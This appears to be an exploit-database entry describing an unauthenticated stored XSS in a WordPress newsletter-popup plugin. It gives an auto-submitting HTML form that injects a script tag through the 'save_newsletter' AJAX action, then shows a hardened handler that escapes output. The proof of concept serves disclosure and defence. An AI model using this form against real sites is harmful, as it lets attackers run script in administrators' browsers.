## https://sploitus.com/exploit?id=WPEX-ID:F4047F1E-D5EA-425F-8DEF-76DD5E6A497E
1. Make sure there is a newsletter configured with the setting "Email Service > Save to local database"
2. When not logged in, use an HTML file where `<NL_ID>` is a valid newsletter ID:

```
<body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/admin-ajax.php" method="post">
        <input type="hidden" name="action" value="save_newsletter">
        <input type="hidden" name="nl_id" value="<NL_ID>">
        <input type="hidden" name="nl_name" value="Unauthenicated">
        <input type="hidden" name="nl_data" value='EMAIL%3Dtestemail%2540email.com%26NAME%3D"><script>alert(1234)</script>TIME%3D2024-03-15%252009%253A24%253A36'>
        <input type="submit" value="Submit Request">
    </form>
</body>
```
3. Go to "Newsletter Popup > Local Record"
4. Select "Show Record" and see the XSS
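
The steps above work because the `save_newsletter` AJAX action accepts `nl_data` from a logged-out request and the "Show Record" view prints the stored value without escaping. The following is an added example of a hardened handler and record view, not the plugin's own code: the `example_*` function names, the `example_nl_save` nonce action, the `_nonce` field, the `example_nl_records` table and the way `nl_data` is decoded are all assumptions.

```php
<?php
// Added example: hypothetical hardened handler, not the plugin's code.
// Assumed names: example_* functions, 'example_nl_save' nonce action,
// '_nonce' field, 'example_nl_records' table.
add_action( 'wp_ajax_save_newsletter', 'example_save_newsletter' );
add_action( 'wp_ajax_nopriv_save_newsletter', 'example_save_newsletter' );

function example_save_newsletter() {
    // Reject requests that lack the nonce printed with the popup form.
    if ( ! check_ajax_referer( 'example_nl_save', '_nonce', false ) ) {
        wp_send_json_error( 'bad nonce', 403 );
    }

    $nl_id = isset( $_POST['nl_id'] ) ? absint( $_POST['nl_id'] ) : 0;
    $raw   = isset( $_POST['nl_data'] ) ? wp_unslash( $_POST['nl_data'] ) : '';

    // Assumption: nl_data is a URL-encoded query string (EMAIL=...&NAME=...).
    parse_str( urldecode( (string) $raw ), $fields );
    $get = static function ( $key ) use ( $fields ) {
        return isset( $fields[ $key ] ) && is_string( $fields[ $key ] ) ? $fields[ $key ] : '';
    };

    // Sanitize on input: markup is stripped before anything is stored.
    $email = sanitize_email( $get( 'EMAIL' ) );
    $name  = sanitize_text_field( $get( 'NAME' ) );
    if ( ! $nl_id || ! is_email( $email ) ) {
        wp_send_json_error( 'invalid input', 400 );
    }

    global $wpdb;
    $wpdb->insert(
        $wpdb->prefix . 'example_nl_records',
        // The timestamp comes from the server, not from the client's TIME field.
        array( 'nl_id' => $nl_id, 'email' => $email, 'name' => $name, 'created' => current_time( 'mysql' ) ),
        array( '%d', '%s', '%s', '%s' )
    );
    wp_send_json_success();
}

// Admin "Show Record" view: escape on output as well, so rows stored
// before the fix cannot run script in the administrator's browser.
function example_render_record_row( $row ) {
    printf(
        '<tr><td>%s</td><td>%s</td><td>%s</td></tr>',
        esc_html( $row->email ),
        esc_html( $row->name ),
        esc_html( $row->created )
    );
}
```

Escaping in the record view is the part that closes the stored XSS; the input sanitization and nonce check reduce what reaches the database in the first place.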